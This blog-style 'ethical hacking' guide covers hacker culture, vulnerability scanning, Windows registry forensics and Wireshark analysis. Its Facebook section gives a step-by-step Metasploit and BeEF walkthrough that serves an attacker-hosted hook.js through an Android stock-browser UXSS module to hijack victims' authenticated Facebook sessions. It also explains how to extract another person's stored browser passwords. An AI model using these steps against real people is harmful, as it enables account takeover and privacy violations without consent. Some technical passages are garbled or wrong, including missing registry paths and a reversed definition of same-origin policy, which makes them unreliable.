Ethical Hacking Guide (2019)

Ethical Hacking Guide

Ethical Hacking Guide | How to Hack

Ethical hacking refers to hacking systems to help improve them. This kind of hacking is not meant to cause problems but to find potential problems and provide solutions for them.


This type of hacking is conducted by a company or an individual for the sole purpose of finding vulnerabilities and potential threats. This guide explains How to Hack the computer and drives passwords and Facebook profile passwords in order to improve security.


What an ethical hacker basically does is to try to bypass the system security and then search for any weak points that may be exploited by malicious hackers.


It’s essentially like taking a new car out for a test drive and trying to find any issue that may come up. This way, developers are able to fix and modify it so that by the time it is put in place or marketed, the product is already at its best and most secure.


The ethical hacker makes a report on the processes and findings, which the company or organization will use to improve upon and strengthen its security system. This helps to lessen, if not eliminate, the potential for attacks in the future.


This is a very important process for developers and organizations because security is one of the most important features that people are seeking today.


Factors in Ethical Hacking

Ethical Hacking

Hacking, as has been mentioned before, is neither always bad nor always good. For a hacking activity to be ethical, it has to have the following elements:


There should be expressed permission to prod a network and make an attempt at identifying the vulnerabilities and potential risks to security. The permission is most often best given in written form (for legalities and formalities).


Respect for the privacy of the company or of the individual. Thus, any findings should be kept confidential. Close the work thoroughly. Do not leave any loopholes or openings in the system that others may exploit. 


Make vulnerabilities and security issues known to the developer or hardware manufacturer. That is, fully disclosing the results of the hacking in order to help them fix these issues and strengthen their products.


Ethical hacking is something that a lot of people are dubious about. Most people are unconvinced that there is such a thing as ethics in hacking.


But there is. Truthfully speaking, a lot of ethical hackers started out as malicious or black hat hackers. Also, some companies, universities, and agencies do offer legitimate hacking jobs and software development opportunities to some hackers.


Hackers are indispensable in creating secure and reliable systems. They go through numerous backdoors and holes trying to see openings or vulnerabilities. To make this point so much simpler, just think of a homeowner. He wants to make sure that his house is safe and burglarproof. So he installed several anti-theft systems like alarms and such.


No matter how much he tries to burglar-proof his home with everything from primitive traps to high tech alarm systems, the only time gets to know full well how these things work is when faced with an intruder. Imagine two scenarios.


First scenario: The owner installed all these security features and then moved into the home only to find out later that a burglar was still able to enter the premises. This placed the owner in peril because he was unable to see any vulnerability in his security system yet he placed his full trust and confidence in it.


Second scenario: The homeowner installed all available security systems in his home, but before he moved in, he hired someone who knows how a burglar works to test his security features. This “hired burglar” then acted as if truly invading this home. He used every means possible to try to break in.


If he was successful, he reports to the homeowner how he got in. What features or weaknesses did he find that enabled him to break in despite all the security system.


Then, basing on these findings, the homeowner installed the necessary add-ons and reinforced these weak points to finally make it virtually impossible for anyone to break into his home without permission.


The first scenario places any software or hardware at risk for serious compromise once it is in full use. For example, security software that underwent a similar process as in the first scenario was installed in a facility that required the highest possible security, like a bank or a museum of rare and valuable artifacts.


That would be placing all the valuable items at high risk because there is a high potential that hackers out there would find some opening or weakness they can exploit in order to get in and destroy the security system.


But if the second scenario was performed, there will be higher confidence in the security system because it has been subjected to more rigorous and real-life testing.


This is just one of the many contributions of hackers in the development of software and hardware. Their findings are invaluable that help organizations and developers to improve and strengthen their systems. 


Hackers who wish to be known as ethical hackers can take a test and be certified as a CEH or Certified Ethical Hacker. This way, organizations needing their input would know they can be trusted to do the job.


The certification is given by the EC-Council (International Council of E-Commerce Consultants). Interested individuals can take the test for $500. The test has 125 items, consisting of a multiple-choice type of questions for version 8 of the test. Version 7 of the certification test has 150 multiple choice-type questions.


Where Hackers Attack and How to hack.

Hackers Attack

At this point, you may have listed down all the privacy policies, unsecured hosts and their functions, and all the applications that you have in your computer in order to find out from which direction would an attack against you would probably come from. If you have not done so yet, it’s okay.


Just make sure that you have made it a point to run antimalware or anti-Spybot programs in your computer to learn if it contains any program that may be spying on your activities.


When you take the step to assess the vulnerabilities of your network and your computer, you will definitely want to learn the favorite places to attack from hackers themselves.


You can actually search hacker boards online to have an idea about their favorite methods of attacking, or you can make use of the following databases that show where computers are typically most vulnerable:


  • 1.NIST National Vulnerability Database
  • 2.US-CERT Vulnerability Notes Database
  • 3.Common Vulnerabilities and Exposures


By learning common vulnerabilities, you will be more aware of the most classified vulnerabilities that are repeatedly being exploited by malicious hackers. That would give you a good jumpstart into knowing what area of your network or computer you should be testing for weakness first.


If you do not want to look at the most common computer vulnerabilities and jump right into testing your own system, here are the options that you have:


1. Automated testing – This is ideal for those who want quick reports on vulnerabilities as often as they want.


2. Manual testing – This would entail manually connecting to ports, and would be a great time to learn which ports are vulnerable. You will get results that are listed in the databases mentioned above, but that would give you an idea of how these vulnerabilities are discovered.


Tools you can Use

There are several ethical hacking tools that are available online that will help you discover vulnerabilities in your system.


Most of the tools that you will find would allow you to exploit specific types of vulnerabilities, so they may not show you all the weak points in your system. However, you may want to use them if you have managed to seek all the possible weak points and would want to zero in on specific vulnerabilities for testing.


A great tool that you can purchase for scanning vulnerabilities would be the QualysGuard Suite. It serves as both a port scanner and a vulnerability scanning tool. It runs in a browser, which means that you would not need a second computer to run its tools for scanning – just type in your IP address and it will promptly do the scan.


You can also install another software from the same manufacturer that would allow you to scan internal systems. Once you are done, you can choose to validate the results.



Once you have discovered security flaws in your computer system, you can easily do the following hacks:

  • 1.Access other systems that are still connected to yours
  • 2.Capture screenshots
  • 3. Find sensitive files and access them
  • 4. Send an email as the administrator
  • 5. Start or stop applications or services
  • 6. Get access to a remote command prompt


  • 7.Gain more information about different hosts and the data they contain
  • 8. Upload a file remotely
  • 9.Launch a DoS (Denial of Service) attack
  • 10.Perform a SQL injection attack

You can use software known as Metasploit in order to demonstrate how you can do all these by achieving a complete system penetration. By doing so, you can see how far a malicious hacker can do once he is able to know all the vulnerabilities of your computer.


The concept of Free Access in Hacking

Free Access in Hacking

It may come as a surprise but hackers also have their own set of ethics. There are 5 general principles or tenets that great hackers follow regardless of what “colors” may be. These are sharing, decentralization, openness, world improvement, and free access to computers.


Free access to computers

This is one of the firm beliefs that hackers – and non-hackers alike- are trying to uphold. Access should be unlimited and total, extending from access to computers and to other things that can help an individual learn about how things are in the world. That’s accessibility to information that everyone should be privy to.


Computers are vital to hackers. It’s like the legendary Aladdin’s lamp they can control and use as vessels to further their learning, skills, and other personal goals. A computer is like an artificial limb that helps hackers live a life that is more focused, with direction, adventurous, and enriching.


Even a small computer can be used to access vast amounts of power and influence all over the world. And this exhilarating experience is something that hackers from all over the world wish everyone to tap into. It isn’t purely for malice and spreading terror and inconvenience to others.


It is a rich ground for creativity and for contributing to the advancement and innovation of technology that can ultimately benefit people from all over the world.


For instance, hackers may make internet access more available to people, even in remote places without having to pay exorbitant amounts or be at the mercy of large corporations.


Hackers live by the idea that people, regardless of age, sex, race, education, and economics should be able to have access to computers as a means to see, learn and understand more about the world.


For hackers, access to information is crucial. The skills and capabilities are developed by building upon pre-existing systems and ideas. The access enables hackers to take systems and applications apart, fix them, or improve upon them. These also help in learning and understanding how things work and what can be done to improve efficiency and function.


Access is only not for the benefit of hackers (whatever color they may be). It also is a very important driving force in the expansion and faster improvement of technology.


Free access to information

Free access to information

This concept is directly related to the desire for full, unlimited access. Information should be accessible to enable hackers to work on, fix, improve and reinvent various systems.


Also, the free exchange of information enables the expression of greater creativity. People can convene and share their ideas that can help in improving or advancing systems.


Systems can also benefit from a less restrictive information flow, which can be referred to as transparency. The reference to “free” access is not a reference to the price.


It is understood that some information may have to be paid for certain prices, based on how valuable they are and how many people have access to it. “Free” in this context refers to unrestricted access.



Mistrust of certain authorities happens for several reasons. One of the biggest reasons is that the authorities, and some certain laws, can restrict access. In some places, certain authorities, laws, and regulations make it almost impossible for hackers to operate. This blocks free access to information, and at times, the free exchange of ideas.


This led to one of the fundamental beliefs of the hacking world that bureaucracies are a flawed system that impeded growth and advancement. Whether it exists in universities, corporations or in government, it is a huge roadblock in the road to progress.


A Few More Issues

One of the other attractions of the hacker community is its embracing character. They do not judge others based on age, ethnicity, education, sex, position and other similar categories that the rest of society follow. What matters most is one’s hacking skills and achievements.


Hackers do not discriminate, which makes their community very attractive for people who have the skill but are cast aside by governments, corporations, etc merely because of what they are (e.g., sex, race, education, social positions, etc). Anyone can be a hacker and be a good one at that. It does not have to be based on any other criteria than on skills, creativity and getting results.


That being said, hackers from all walks of life from all over the world are welcome in the community. The only thing required in order to be a part of the community is the willingness to share and collaborate.


Hacking culture has survived for this long despite having to go underground for most of the time and dodging other people (e.g., authorities, corporations, governments, etc) because hackers are willing to share and collaborate. This becomes ever so true when times are tough.


The ultimate determinant is hacking skills. This fosters faster advancement in terms of hacking and software development.


For example, a 12-year old kid has been accepted by a hacker community, when all other non-hacker students have rejected him. This kid proved to be very talented, contributing significantly to technology and software development.



Hackers are not all about destroying systems and leaving them in unusable, unredeemable tatters. They recognize there is beauty and art in programming and computer use. Innovative techniques coming from creative minds that were given the right opportunities can help in advancement, progress, and improvement.


Hackers can help improve existing applications, create better applications, and point out vulnerabilities that can help make cyberspace a more attractive and more fun environment in which to work.


Beauty and art are not just in the output, results, or applications; these can also be found in the program codes. It is not just a string of binary, characters, and literals; it is carefully constructed, artfully arranged, and finalized to produce a symphony. A redundant, unnecessary cyclically written code is considered a poor, sloppy, and unprofessionally constructed program.


The most efficient and most valuable program is one that performs complicated tasks and produces reliable and efficient results or actions with a few instructions. It should also save as much space as possible. In today’s world, the less space required to run a program, the more desirable and sought after it becomes.


And hackers come in very handy for this purpose by pointing out vulnerabilities, redundant or unnecessary files or codes that slow down programs. In fact, in the early days of hacking, they had some sort of “game” or race on how much space can be saved from programs.


 Culture of Sharing

 Culture of Sharing

The hacking community has lasted this long because of the concept of sharing. This has been a fundamental element in hacking, from its early days until the present. The ethics and culture of open sharing and collaboration have made the hacking culture flourish and improve over the years.


The software is commonly shared, which included the source codes. Sharing is the hacker norm. It is something expected in the culture of non-corporate hacking.


The culture of sharing among hackers started at MIT when hackers would develop programs and share the information (including source codes) to other users. This allows other users to try to hack the newly develop0ed program. If the hack was considered good, then the program is posted on the board.


This allows others to improve it and add or build programs upon it. The offshoot programs and improvements were saved in tapes and then added to a program drawer that other hackers can access.


It’s like building a free library that any hacker can access and use anytime for learning, inspiration or innovations. Hackers would open these program drawers, choose any program, and then add or “bum” to it to improve it. “Bumming” is a hacker term that refers to making a program code more concise.


This enables programs to take up less space, perform more complex tasks using fewer instructions, and become more simplified. The memory space saved allows for the accommodation of more enhancements by other hackers.


This was during the early days of hacking and it has continued up to this day. This also opened the hacking community to a wider population, allowing more people to be able to learn and share their ideas. This contributed to several advancements that would have taken more years to develop if not for the combined efforts of hackers everywhere.


The “Hands-On” Imperative


This is the hacker community’s common goal. The Hands-On Imperative is what drives the hacking community. The community believes that vital lessons about systems and about the world can only be fully appreciated by taking things apart and observing how each component works.


Then, this knowledge becomes the basis for creating something new, more interesting and innovative.


To employ this imperative, there must be free access sharing of knowledge and open information. In the hacking world, unrestricted access allows for greater improvements. If this isn’t possible, hackers would find ways to work around any restrictions.


There is “willful blindness” among hackers in their single-minded pursuit for perfection. This may look like deviant behavior, but it does prove to produce some amazing results that the whole world benefitted from.


This is a prickly issue but the hacking community stands by the concept that the end can justify the means. There are, admittedly, quite a number of remarkable and very innovative results from the hacking world, despite, well, having to break a few rules.


The general public has experienced some advantages, too, from some of the hacking activities. The truth is hacking is not all bad, but it isn’t all good, either. It is both selfish, willful noncompliance with certain rules and something like a Robin Hood kind of thing.


For instance, hackers in MIT, in the early days of hacking, had to work around login programs and physical locks. The entire operation was not something malicious. There was no willful intent to harm any of the systems or to inconvenience other users.


It was a means to improve, build upon and perfect existing systems. This is in contrast with the usual hacker activities that get in the news, where hackers crack security systems merely to wreak havoc, create cyber vandalism or to steal information.


Hacking as a Community and Collaborative Effort

Hacking as a Community

Becoming a hacker means becoming a member of a community. It entails collaborating with other people, either to share or to obtain information and ideas.


Each hacker generation had communities, mainly based on geography, which enabled them to share and collaborate. For instance, hackers at MIT developed a community within their labs, where they spent most of their time working on computers.


The second-generation hackers (who were more on hacking hardware) and the third generation hackers (who were more into hacking games) were able to develop their own communities in the famous Silicon Valley.


This was also home to the popular Homebrew Computer Club and People’s Computer Company, which produced big names in the technological world such as Bill Gates. There were also the labs like Bell, the one at MIT, UC Berkley, and LCS labs.


These communities provided avenues where budding hackers were able to join networks, collaborate with others to improve their ideas, and eventually to get started on their own projects. This was where they found others that can help them improve or create certain portions of their projects that they find challenging to do on their own.


The numerous tech companies and software developers that changed the world mostly came from these communities. They were the movers and shakers of past decades that have set up many of the technological advances that the world enjoys today.


Some of these are the more accessible and widely available Internet, hardware and software innovations such as smartphones, faster and more efficient gadgets, groundbreaking software that made life so much convenient and others.


Today, hackers still have a community and continue to collaborate. The difference is that these are no longer geographically limited. Before, hackers had to meet personally, such as in Silicon Valley.


Today, anyone from anywhere in the world can work with others, even from thousands of miles away. Collaborations are mainly through communicating over the Internet.


Before, Internet access was limited to large universities, some governments, and a few large corporations. This made collaborating cheaper and more sustainable by actually meeting in person, sharing and collaborating within a limited geographical location.


With the advent of affordable Internet access, more and more people are able to join the community. The coverage of the hacking community has extended widely and has included more people from all walks of life, from all over the world.


Hacking Facebook

Hacking Facebook

Facebook is probably one of the most secure sites that exist today, which makes it an ideal place on the web to share information about yourself, or anything that is on your mind.


However, Facebook can also be a place where the most sensitive information is stored (thanks to chat boxes), and a hacked Facebook page may also mean the fall of a brand or the reputation of its corporate users.


If you are working as part of your company’s information technology security team, Facebook may be one of the main things that you must protect in order to ensure that your job stays afloat!


Can You Really Hack Facebook?

Facebook itself has deep encryption when it comes to passwords – there is no way that you can know what your password is in any case you forget it because Facebook only has a protocol of letting you know that your password is right, but it offers no means of letting you see it.

What does this mean? Facebook offers you two options when it comes to entering a password for a specific account:


1. You would have to enter it yourself and then let your device store that information so that you can enter your account without having to enter your username and password again


2. You would have to reset your password in any case you forgot it and you would need to sign in from another device

However, this does not mean that hackers really are in a total dead end when it comes to knowing a Facebook password. In this blog, you will know some of the known ways of hacking a Facebook account by exploiting the vulnerabilities of devices and applications that have access to it.


Using the Android’s Stock Browser Flaw


Google has been aware of the stock Android browser’s security flaw and has made the necessary patches. However, the browser isn’t automatically patched in most Android systems nowadays. Because of this, the following hack would work on most Android devices.


The term Same Origin Policy (SOP) is one of the many important security measures that browsers need to have. This policy means that browsers should be designed in such a way that web pages have the means to load any code that is not integrated into their own resource.


By having this policy, website owners would have the peace of mind that no criminal hacker would be able to inject codes without having to secure their authorization first.


Unfortunately, the Android browser that comes installed by default does not enforce this security policy adequately. Because of this, it is possible for a hacker to get his hands on all pages that are open using this browser.


It also means that once an Android user uses this browser to go to a trapping website which would inject a code, it would always be possible to access all the sites that are opened in this default browser. This method, as you have already read in the previous blog, is called phishing.


How to Phish for Facebook Details

In order to create a phishing trap, you would need to install the software called Kali Linux. Within this system, you would find two tools, BeEF, and Metasploit, which are both necessary for creating a phishing scam. Follow the steps to start hacking:


1. Pull up Metasploit

Fire up Kali Linux and key in the following command:

 kali > msfconsole


You would see a screen that says that you are about to set up listeners, landing pages, or emails for phishing. If you want to learn more about Metasploit, you can visit Metasploit: Penetration Testing Software | Rapid7.


2. Search for the exploit

Now that Metasploit is running, find the program that you need to exploit. In order to do that, key in the following command: 

MSF > search platform: android stock browser 

 You would only get one module for the exploit, which is: auxiliary/gather/android_stock_browser_uxss


Load this module by typing: msf > use auxiliary/gather/android_stock_browser_uxss


3. Display the information that you need to plan your exploit

After loading the module, you would have to find the information that you need on how to exploit the stock browser.

To do this, key in: msf > info


You would read in the description page that the exploit that you are about to use would work against any Android stock browser that has been released before Kitkat 4.4. It would also tell you that by using this module, you would be able to run an arbitrary JavaScript using a URL context.


4. Display the options

You would need to see all the options that you need in order to make the module work. To launch the module, you would need to set the REMOTE_JS.


5. Launch BeEF

Once you fire up this software, you would see a brief tutorial on how to hook a browser. On the Getting Started page, you would see links on how to point a browser to another page, plus other tutorials. Leave the BeEF program running.


6. Set the REMOTE_JS to BeEF Hook

Go back to Metasploit and set the REMOTE_JS to the webpage hook on BeEF. Make sure that you use the IP of the BeEF that you are running. To do this, use the following command string:

msf > set REMOTE_JS http://(IP address of the BeEF’s server)/hook.js Now, set the URIPATH to the root directory. Type the string:

msf > set uripath /


7. Fire up the server Key in the following command: msf> run


Doing this would allow you to start the Metasploit’s web server and allow you to serve on the BeEF hook that you have set a while ago. After doing so, anyone who navigates to the website would have their entire browser hooked on BeEF.


8. Try to go to a website from the stock android browser

Now, you are going to try to go to a website using the browser that came with the Android device, just like what a target user would do.


What would happen is that when they navigate to the webpage that hosts the hook that you have created with the earlier steps, the browser would be automatically injected with a JavaScript from BeEF?


For example, if the user connects to the web server that you have used at, the BeEF explorer window will show that the browser you are targeting is now under “Hooked Browser”.


9. Check if the browser is authenticated to Facebook

Go back to BeEF and navigate towards the B tab. Go to the Network folder and click on the Detect Social Networks. Clicking on this command will allow the software to see if the target is authenticated to Twitter, Facebook, or Gmail. Click on the Execute button to launch the command.


BeEF would return to you with the results. If the target has not authenticated the browser to Facebook, all you need to do is to wait for the target to connect to Facebook. Once he does, do this command again. Once his Facebook has been authenticated, you can direct a tab to launch the user’s Facebook page!


Make Use of the Cache


Another hack that you can use to pull up another person’s Facebook account makes use of the fact that most people tend to store their passwords on the devices that they are using.


Since there is a lot of people that do not want to fill in the username and password forms over and over again, there is a big chance that you can find the stored passwords for all accounts of a target user somewhere on his computer.


If the target user has the habit of clicking Remember Me on all sites that he visits so that he won’t have to re-authenticate again and again, then it is very likely that you can find all his passwords in one sitting.


At this point, you would need to remember one golden rule in hacking – if you can get physical access to the device that you intend to hack, then it is possible for you to get all the passwords that you need.


The key to this is to know where operating systems and browsers would normally store passwords and know how to crack hashed passwords when you spot them. For example, Mozilla browsers are known to store user passwords for Windows users at this path:




The passwords that you would see here would only be encrypted as Base 64 encoding, which you can manually decode. You can also use software similar to PassWordViewer to decode this type of encryption with ease.


Use the Elcomsoft’s Password Extraction Tool

Elcomsoft is a known decryption company whose main goal is to create and sell software that is designed to crack different types of password encryption. One of the hacker favorites from this company is the iCloud hack tool that recently revealed nude photos of celebrities that are supposedly locked down on the iCloud server.


Elcomsoft is also the known developer of the Facebook Password Extractor, which exploits the possibility that users have clicked on the Remember Me button to authenticate their profile using a Windows device. To use this tool, you would need to have physical access to the device that your target is using.


If that is not possible, you would need to hack into the target system and upload this tool. If that is also not possible to accomplish, you can download the user’s browser password file that is stored on the computer and then uses this tool locally. This tool would be able to work on the following:


  • 1.Early Google Chrome editions, up to Chrome 11
  • 2.Microsoft Internet Explorer versions up to IE9
  • 3.Mozilla Firefox editions up to Firefox 4
  • 4.Apple Safari editions up to Safari 5
  • 5.Opera editions, up to Opera 11


[Note: You can free download the complete Office 365 and Office 2019 com setup Guide.]


Securing Facebook

Securing Facebook

At this point, you would realize that the workaround against these attacks is fairly simple: since attacks that are aimed to hack your Facebook account would only work if hackers have access to your devices, the first rule to Facebook security is to prevent anyone from having physical access to your devices.


It would also be a good idea to start upgrading your web browsers for better encryption policies for your passwords, just in case you would need to part with your devices.


Another great security measure is to keep your passwords safe by avoiding any means of storing them in your devices. That means that you would need to stop the habit of clicking Remember Me on any website that you log into. This way, you would never have to worry about people getting their hands on your social media accounts while your device is away.


Introduction to Digital Forensics

Digital Forensics

Ethical hackers are known to be experts when it comes to knowing where an attack is coming from and identifying types of computer crime.


For this reason, it is very important for them to know any possible way to attribute an act of criminal hacking to its perpetrator and also prevent any damage that may occur on their system. Simply put, ethical hackers should know how digital forensics work.


Defining Digital Forensics

Digital forensics is the field of hacking that is dedicated to determining any form of digital intrusion. This area of interest relies on the fundamental hacking concept that any digital crime creates a footprint that can be linked back to a hacker.


These footprints may be found in log files, registry edits, malware, traces of deleted files, or hacking software. All these footprints serve as evidence to determine a hacker’s identity. Of course, all collected evidence would point towards a hacker’s arrest and prosecution.


It does not mean, however, that criminal hackers are not aware of how digital forensics work. Like how you have been studying how criminal hackers work, they have also been studying how they could possibly leave any traces or set alarms for detection.


That means that ethical hacking and black hat hacking are constantly evolving – both types of hacking are continuously trying to find each other’s vulnerabilities.


Tools for Digital Forensics

Learning how to investigate a hacker’s footprints is best when you are using the same tools that are used by a forensic investigator. Here are some of the most effective and commonly used tools to find a criminal hacker.


1.Kali Linux

Yes, Kali can serve as both a tool to test and exploit vulnerabilities, and also detect any intrusion in both hardware and software. Kali Forensics are divided into numerous categories, which are as follows:

  • 1.Ram Forensics Tools
  • 2.Password Forensics Tools
  • 3.Forensic Hashing Tools
  • 4.Forensic Hashing Tools
  • 5.Forensic Suites
  • 6.Network Forensics
  • 7.PDF Forensic Tools
  • 8.Digital Anti-Forensic Tools
  • 9.Anti-Virus Forensic Tools
  • 10.Digital Forensics
  • 11.Forensic Analysis Tools
  • 12.Forensic Craving Tools
  • The Sleuthkit Kit (TSK)
  • Helix
  • Knoppix


If you aim to go for commercial-grade digital forensics that is being used by law enforcement and other digital security companies, you can go for the following tools:


  • 1.Guidance Software’s EnCase Forensic
  • 2.Access Data’s Forensic Tool Kit (FTK)
  • 3.Prodiscover


Take note that these tools may require payment for some of their reporting features, and of course, these payments are on top of your subscription. Truth be told though, you are mainly paying for their nice interface and their user-friendliness. At the same time, these tools are also great for training, reporting, and certifying.


All digital forensic tools follow the same logic, whether they are open-source or paid. They would all require you to have a better understanding of what a hacker system looks like and how all hacking activities may potentially leave a mark on everything that has been intruded or destroyed.


For this reason, it does not matter what tools you are using, as long as you understand how a target and a hacker system works.


What You Can Do With Digital Forensics

Digital Forensics

If you aim to be an expert in the field of digital forensics, you would be able to do the following in no time:


1.Determine the time when a particular file was modified, created, or accessed

2.Track the location of a cellular phone device, regardless of whether its GPS is enabled or not

3.Determine all the websites that a hacker has visited, along with all the files that he has downloaded


4.Extract any form of data from the volatile memory

5.Determine who hacked a wireless network and identify all other unauthorized users of a client network

6.Trace a malware using its components and digital signature

7.Crack passwords of encrypted files, hard drives, or patches of communication that the hacker may have left behind


8. Determine the type of device, computer, or software that may have created a malicious file or have launched an attack.

9. Find out what commands or software that a hacker has used within a client system

10. Find out the device, time, or location involved in a screenshot or a photograph


Digital forensics can achieve more than what’s on this list, and for that reason, hackers are busy trying to build tactics that may counter what a forensics investigator may do to evade punishment. Because of the advancement of digital forensics and law enforcement, hackers have created another field of hacking, which is anti-forensics.


What is Anti-Forensics?

Anti-forensics, as the name implies, is the branch of hacking that specializes in evading all techniques and tools that a digital forensics investigator may use. Some of the techniques that this branch of hacking employs are the following:


1. Trail obfuscation – this is the practice of misleading digital forensics into following another attack source, rather than finding the attack itself


2.Timestamp alteration – this is the practice of changing the timestamp that investigators see when they check when a file was modified, access, or changed


3.Artifact wiping – this practice ensures that all attack fingerprints done by a criminal hacker’s computer is erased from a target computer to prevent detection.


4. Data hiding – this includes encryption of any possible artifact or steganography


Now that you have a clearer idea on how you can find attacks and attackers, and you know how they can also counter the tools that you would be using, you should understand that dealing with criminal hackers is not that easy.


Your goal is to outsmart them by thinking ahead and having the foresight of knowing what they would probably do next. By being able to predict what they can do to counter your forensic tools, you can switch to a different tactic and prevent any other attack.


Windows Registry and Forensics

Windows Registry

Since you are now aware that hackers leave trails on their target’s computer that can be linked back to theirs, it is high time that you know how to actually find these trails for evidence.


Here is something that most newbie hackers are not aware of – if they are attacking a Windows operating system, they are leaving most, if not all, of their artifacts in a single location. This location is called the registry.


What the Windows Registry Does

Almost all Windows users know that there is such a thing called Windows Registry in their system, but only a few understand how to locate and manipulate it.


For a forensics investigator, the registry is the home of digital evidence, since it houses all information that tells when, where, what, and how any change in the system happened. More importantly, it can tell which user initiated the change, and how it happened.


Within the Windows, Registry is five root folders, which are referred to as hives. HKEY_USERS – houses all the user profiles that are loaded into the operating system

  • HKEYCLASSES_ROOT – contains all config information on any application that is used to open files
  • HKEYLOCAL_MACHINE – contains all config information, including every software and hardware set
  • HKEYCLASSES_CONFIG – contains hardware configuration profile of a client system upon startup


When you type “regedit” on the Windows search bar, you would be able to launch these root folders and their subfolders, which are called subkeys. These subkeys would show descriptions and values on the right pane. The values that you may see are either 0 or 1, which means on or off, and the more complex information is often displayed as hexadecimal values.


From this, you would see the following information and more:

1.All devices that have been mounted on the system, including flash drives, external hard drives, cellular devices, keyboards, or speakers

2.List of all files that have been accessed and when they were last opened or modified


3.When the system connected to a specific access point

4. Most recently used software

5.User profiles and the last instance they used the system

6. All searches are done on the system


Since you are now aware of what you can find in your operating system’s registry, all you need to know is to learn where you can find information that may have been left during unauthorized access or attack in the computer that you are investigating.


RecentDocs Key

If you suspect that your computer has been breached, the first thing that you would want to know is if an unauthorized user has accessed any of your sensitive files. You can find that out by accessing this location:




If you are trying to see whether an attacker has accessed a Word file, all you need to do is check the list of the .doc or .docx files that have been recently accessed, which can be pulled up by clicking the appropriate subkey on the left pane.


If you pulled up the document that you want to investigate, you would see that the data is in hex at the left side, and then ASCII on the right.


Now, if you are trying to find any evidence of a possible breach, you would want to find any file that may be unrelated to your system. Here’s an example: a .tar is uncommon for a Windows OS, but can be usually found in a Linux or Unix system. Its job is similar to a .zip file, but what could it be doing there in your file directory?


It is possibly a malware that unpacks when triggered. You can check the contents of the .tar file to get more information about an attack or the one who launched it.


Typed URLs Key

When you run a URL in Internet Explorer, that specific information is also stored in your registry at this path:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs


If you are not using this browser to surf the Internet, it is very likely that the attacker is using IE to launch an attack by downloading malware. It may also reveal what the user was looking at or was trying to find when the attack was launched.


Stored IP Addresses

The registry makes sure that it holds all the IP addresses of all users that it connects to, including all the interfaces that have connected to the targeted computer.


When you look at the list of IP addresses, you would find all addresses assigned in all interfaces, including details about the time when the DHCP server leased them. If you suspect that your computer was attacked through an access point, you can also see the IP address assigned to your suspect during the time of the intrusion.


Startup Locations

Startup Locations

Forensic investigators make sure that they are aware of all applications and services that are triggered to start whenever the targeted computer boots.


An example of a file that may run during startup would be a malware or a listening payload that needs to run in order to keep an attacker connected to his victim’s device.


Knowing this information would also make you aware that there are several other locations in the computer that are infected by the same file, which tells you the locations that the attacker wants to monitor.


The most-used location for hackers is this:



When malware is attached to your computer in this location, it would be set to run every time you start your computer, along with other software or directories that are linked to this path. For this reason, this path is also the best location to make sure that rootkits and other types of malicious software are running.


RunOnce Startup

RunOnce Startup

If you suspect that a file that only needs to run once during startup infects your computer, you would most likely find the suspected file here:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup Services


You would sometimes notice that there are several services in your computer (particularly the ones that you need to deter intrusions) that do not seem to load during startup.


If you want to see if the settings have been altered to let a malicious file in without your knowledge, you would find the information in this path:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services Start When a Specific User Logs In


If you suspect that strange behavior in your computer happens only when a particular user logs into your system, then you can check if a particular service or file is set to run in this path:



Of course, a skilled criminal hacker should have knowledge on how to use this information to conceal his tracks. For this reason, it would be wise to make sure that you’re familiar with a few good tools that an attacker may have his hands on. It’s also advantageous to be fully knowledgeable of your operating system’s current state.


Going Undercover in Your Own Network

You are aware that there are a number of attacks launched using the network, which means that hackers do consider access points to be among the most vulnerable aspects of any information technology fortress.


If you remember the Heartbleed incident, you would realize that even top corporations can be easily exploited over the network, even causing their more advanced systems to suddenly spit out confidential and encrypted information about their clients. If they are vulnerable, then so are you.


If you suspect that your system has been attacked over your network, or that someone has made an announcement that they are going to hack you, then you have all the right reasons to monitor what is going on in your network and try to find out who your attacker might be.


Example Problem Scenario

Problem Scenario

Your browser is behaving badly and your homepage keeps on redirecting to a page that tells you that your computer is infected with a virus, and then prompts you that you need to purchase a specific antivirus program.


In addition, your computer also starts lagging and you see that there are too many ads that are popping up. Not only does this disrupt your work, but it also eats up the resources of your computer.


At this point, you are certain that your computer has been infected. You want to know what it is, and where the infection came from.


Get Wireshark

If you already have Kali Linux (yes, the tool suite that can also be used to launch a network attack), then you already have this tool. You can find it in the Network Traffic Analysis drop-down menu. This interface is capable of creating a live capture on your network’s traffic and then analyze the information that is being sent and received on your access points.


Launch Wireshark and do a live capture. You can do that by clicking Capture (found at the menu at the top), and then selecting the active interface. You will see that there are three windows on your screen. The windows on the upper portion will tell you about the packets that you are receiving, and you will also be given some information about them.


The middle window will show you all the bits in your traffic and the packet header’s bytes. The lower windows will show you the packet contents both in ASCII and hexadecimal.


If you look at the contents of the packets, you would probably see that there is a messenger packet coming from a device somewhere in the World Wide Web. You can have a closer look at this packet when you click on it and then inspecting the details that will appear in the white middle window.


If you are aware that messenger services on your network are disabled, you would see that there would be no other activity should be happening. However, you may notice that there is an ICMP packet in the list that says that it is unreachable by your request. This is most likely a suspicious activity.


Scan the Traffic then Filter It

If you are online, you would see that your computer is receiving a lot of traffic. However, with a device like Wireshark, you would be able to select traffic that you are interested in to verify the data that you are receiving. At the same time, you can also check packets and filter the safe from the suspicious ones.


For example, you may see that you are receiving traffic from your reliable antivirus program. When that happens, you can remove that from all the other packets that you see in the window since you are already aware that that specific traffic is coming from a reliable device.


To filter the ones that you have already inspected and remove them from view, use this syntax:

!ip.addr == (IP address of traffic)


After doing that, you can focus your attention to other traffic that can be potentially harmful to your computer.


Start Looking at DNS Queries

Check the other traffic that you see on the window. You would probably see that your computer (check for your IP address) is doing standard queries using a DNS protocol to a site that you do not remember accessing while you were using your computer. If you are aware that you are not currently viewing a site and your computer behaves this way, then you can rule that as a suspicious activity.


Now check the other packets. If your computer’s host appears to be requesting downloads from an unknown site, then it is very likely that your computer has a rootkit and the malware is reporting back to its source! The good thing is that you already know where the rootkit is coming from, and you can run a malware scan to remove it from your system.


Should you think that you are incurring serious damage because of the rootkit, you can save the results to serve as evidence against the culprit once you report them to authorities.


Mitigating Risks

Mitigating Risks

  • At the conclusion of each assessment, each department should maintain documentation showing
  • All discovered vulnerabilities, the severity, and the affected information system(s)
  • For each discovered vulnerability, detailed information on how the vulnerability will be remedied or eliminated


